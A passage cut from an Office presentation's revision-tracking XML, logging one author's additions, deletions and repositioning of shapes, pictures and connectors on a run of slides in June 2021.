          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:59:11.448" v="2074"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127914859" sldId="472"/>
            <ac:cxnSpMk id="8" creationId="{AAB8CA88-9393-4F2A-B61C-AF114BBE513C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T01:59:11.448" v="2074"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127914859" sldId="472"/>
            <ac:cxnSpMk id="9" creationId="{D19FE945-660A-42CD-8F8B-BE6A1503739F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:00:43.820" v="2104" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127914859" sldId="472"/>
            <ac:cxnSpMk id="17" creationId="{B4931C54-6C15-42A8-ACBB-CCDAA2D191CB}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:00:43.820" v="2104" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="127914859" sldId="472"/>
            <ac:cxnSpMk id="18" creationId="{A5B9F48B-C041-4FE2-A262-0CAACD56FC5E}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:12:10.712" v="2148" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2596044937" sldId="473"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:12:08.774" v="2147" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2075397677" sldId="474"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:10.186" v="2130" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2516623109" sldId="475"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:10.186" v="2130" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2516623109" sldId="475"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:20.137" v="2131" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3141623341" sldId="476"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:20.137" v="2131" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3141623341" sldId="476"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:28.825" v="2132" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4107473677" sldId="477"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:28.825" v="2132" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4107473677" sldId="477"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:32.897" v="2133" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1773530336" sldId="478"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:10:32.897" v="2133" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1773530336" sldId="478"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new del mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:37.405" v="2188" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3328644533" sldId="479"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:28.026" v="2154" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328644533" sldId="479"/>
            <ac:spMk id="2" creationId="{FF2FB280-B87C-4517-BAB6-DC9E6D4B7309}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:28.026" v="2154" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328644533" sldId="479"/>
            <ac:spMk id="3" creationId="{AB606FD4-4553-4D33-A777-38AEB0A81858}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:13:28.026" v="2154" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3328644533" sldId="479"/>
            <ac:spMk id="4" creationId="{BE1D27EA-588B-401A-9718-88D7EBF730E2}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:38.082" v="2189" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3785954803" sldId="480"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:09.330" v="2187" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2418320045" sldId="481"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:14:49.827" v="2182" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2418320045" sldId="481"/>
            <ac:spMk id="2" creationId="{89A0440F-A056-4BE8-BB8E-3861FE9122E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:04.794" v="2186" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2418320045" sldId="481"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:15:09.330" v="2187" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2418320045" sldId="481"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:47:11.504" v="2395"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1683867025" sldId="482"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:17:00.362" v="2200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="2" creationId="{370CD65D-A6BF-459B-B957-130607D9A183}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:17:00.362" v="2200" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="3" creationId="{14E221CD-1194-403A-B19C-68DC832EA380}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:21:15.195" v="2236" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="4" creationId="{7DAB109A-81C9-4DD3-8487-BE9AFF4EB873}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:45.826" v="2376" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="10" creationId="{E2F4B83A-F831-40D4-82DA-F49661823B00}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:46:09.969" v="2392" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:spMk id="13" creationId="{23EFB75A-E6AF-44D0-96A9-AE129FC68B33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:22:58.690" v="2240" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="6" creationId="{590C8BB6-78DF-41E4-BDD5-345FFE58E89A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:41.399" v="2375" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="8" creationId="{1F7C72D0-D62A-499C-A6B8-7C849AB1212E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:45:33.106" v="2374" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683867025" sldId="482"/>
            <ac:picMk id="12" creationId="{C1B437B6-903E-460C-9EB2-20C06AB05D3D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:56:48.230" v="2412" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2787378180" sldId="483"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:47:11.504" v="2395"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3022927922" sldId="484"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:27:29.973" v="2262" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="2" creationId="{2B982A6D-5381-41E2-B506-D53AEA7933D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:37:26.738" v="2316" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="11" creationId="{F773C795-1940-4E5A-899F-EA8CDF1F6AE5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:38:09.646" v="2359" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:spMk id="12" creationId="{CF0E252C-8AA9-4860-AF85-370DFD079DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:52.734" v="2295" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="4" creationId="{E85F83B3-8302-4D0C-B0C7-D3AD121DF968}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:50.381" v="2294" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="6" creationId="{707C8B56-5CBF-4DE9-8088-9CA3B9209579}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:35:23.635" v="2278" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="8" creationId="{E0CD9D1B-1E66-4C9A-A04E-06E607F82934}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:36:26.044" v="2293" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:picMk id="10" creationId="{B08BF884-CDEF-4D7A-914C-9F0D4CEB8299}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:39:20.031" v="2363" actId="1582"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3022927922" sldId="484"/>
            <ac:cxnSpMk id="14" creationId="{BDCC988F-E9BC-43F2-81CE-1E02CB63E18F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:46:49.132" v="2393" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="695818154" sldId="485"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T02:44:33.674" v="2367" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="695818154" sldId="485"/>
            <ac:spMk id="2" creationId="{C9749E0C-3927-40D0-B166-F7DF86ACDCF8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:31.851" v="2530" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1979037057" sldId="485"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:12.539" v="2426" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="2" creationId="{E353B482-F9B1-4425-BB0E-1FBC780FF119}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:12.539" v="2426" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="3" creationId="{BDE0E3D6-0581-4B95-841A-7EB7C500F166}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:18.219" v="2428" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="4" creationId="{74134226-8147-4CB6-907D-194E579F0C6F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:01:18.219" v="2428" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="5" creationId="{604A5F76-9478-46DE-81F4-F60B4DC48618}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:02:14.978" v="2432"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="6" creationId="{6A5364ED-6372-42B0-8F40-B24AA14AA454}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="11" creationId="{8A39246C-5DBA-4DED-9015-D17CDBB97641}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="12" creationId="{09D4ED7B-C96A-4351-AAAA-9646E192FBFD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:17.718" v="2528" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:spMk id="14" creationId="{8C2B2658-1045-4FCC-BBFF-9F50A6C9B15C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="8" creationId="{D6642376-3771-4A23-988A-14E881E82403}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:04:24.664" v="2517" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="10" creationId="{9EF32C83-75BB-4834-92CD-1D2764C7758A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T03:05:31.851" v="2530" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1979037057" sldId="485"/>
            <ac:picMk id="13" creationId="{2BDA334F-F2DA-484C-B219-4E9F22B21626}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:48.822" v="2534" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="229412847" sldId="486"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:46.722" v="2533" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:48.822" v="2534" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:01:45.159" v="2532" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="229412847" sldId="486"/>
            <ac:picMk id="1026" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{6B4374A3-947E-4054-9ED4-BE3C4EABE410}" dt="2021-06-28T15:08:17.943" v="2575" actId="1076"/>
